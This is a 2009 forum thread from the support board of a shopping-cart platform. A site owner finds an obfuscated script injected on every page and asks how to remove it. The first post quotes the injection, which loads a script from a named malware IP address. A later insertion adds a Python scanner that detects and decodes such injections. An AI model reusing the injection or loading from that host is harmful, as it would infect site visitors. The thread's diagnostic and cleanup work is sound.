Guest fandango
Posted April 28, 2009

Hi folks, I had my site hacked recently and have found the following inline script just below my </head> tag on every page. The pages take ages to load and it also tries to pull in an external IP address as per below. The IP address has a nasty virus on it which in turn reinfects visitors' computers. My question is: does anyone know what this is, and where a common place to insert an inline script would be? Cos I can't find it anywhere to remove it.

<!-- document.write(unescape('xcV%3Ck3scxcVrirBtptrBt%20sk3rxcVc%3D%2FPW%2F94%2E24k37%2E2%2E1k395rBt%2FPWjxcVquerBtryPW%2ENmjk3s%3E%3C%2FscrxcVipxcVt%3E').replace(/Nm|rBt|xcV|UEJ|PW|hP|k3/g,"")); -->

DO NOT VISIT!!!!! THIS IS A MALWARE SITE AND YOUR PC WILL GET INFECTED: 94.247.2.195/jquery.js

Robsta
Posted April 28, 2009

If it's not in the skin's global templates, you'll need to check all the PHP files, start in the root of the store and then work through the includes files.
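
An added example, not written by anyone in this thread: a Python sketch of the file-by-file check described above, which walks a site root, finds injections shaped like the one in the first post, and decodes them so you can see what each one loads. The file-extension list, the function names and the temporary demo tree are assumptions; the sample string is the snippet quoted in the first post.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import unquote

# Shape of the injection quoted in the thread:
#   document.write(unescape('<encoded>').replace(/<junk tokens>/g,""));
INJECT_RE = re.compile(
    r"""document\.write\(\s*unescape\(\s*(?P<q>['"])(?P<enc>.*?)(?P=q)\s*\)"""
    r"""\s*\.replace\(\s*/(?P<junk>[^/]+)/g\s*,\s*(?P<e>['"])(?P=e)\s*\)\s*\)""",
    re.S,
)
# Assumed set of file types worth checking in a PHP store; adjust to the site.
SUFFIXES = {".php", ".html", ".htm", ".tpl", ".js", ".inc"}
# The snippet from the first post, embedded so the demo runs offline.
SAMPLE = (
    "<!-- document.write(unescape('xcV%3Ck3scxcVrirBtptrBt%20sk3rxcVc%3D%2FPW%2F94"
    "%2E24k37%2E2%2E1k395rBt%2FPWjxcVquerBtryPW%2ENmjk3s%3E%3C%2FscrxcVipxcVt%3E')"
    '.replace(/Nm|rBt|xcV|UEJ|PW|hP|k3/g,"")); -->'
)

def decode(enc, junk):
    """Reverse the obfuscation in the browser's order: unescape, then strip junk."""
    tokens = "|".join(re.escape(t) for t in junk.split("|") if t)
    return re.sub(tokens, "", unquote(enc, encoding="latin-1"))

def scan_text(text):
    """Return the decoded markup of every matching injection in one file's text."""
    return [decode(m["enc"], m["junk"]) for m in INJECT_RE.finditer(text)]

def scan_tree(root):
    """Walk root recursively; map relative path -> decoded injections found."""
    hits = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in SUFFIXES:
            found = scan_text(path.read_text(encoding="latin-1"))
            if found:
                hits[path.relative_to(root).as_posix()] = found
    return hits

def demo():
    """Build a constructed two-file site in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "includes").mkdir()
        (root / "index.php").write_text("<html><head></head>\n" + SAMPLE + "\n<body>")
        (root / "includes" / "clean.inc.php").write_text("<?php echo 'ok'; ?>")
        return scan_tree(root)

if __name__ == "__main__":
    print(demo())
```

Point `scan_tree()` at a downloaded copy of the store rather than the live server, and treat a clean result as covering only this one injection shape.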

Guest fandango
Posted April 29, 2009

Thanks Robsta. Have cleaned my PC for infections and sent all fresh cc files to the server but it seemed to have no effect, so in the end have had to uninstall and reinstall cc3, which has done the trick. Wish I had done an up-to-date backup now. I think this one is a particularly nasty piece of work. Hackers they are the 's spawn.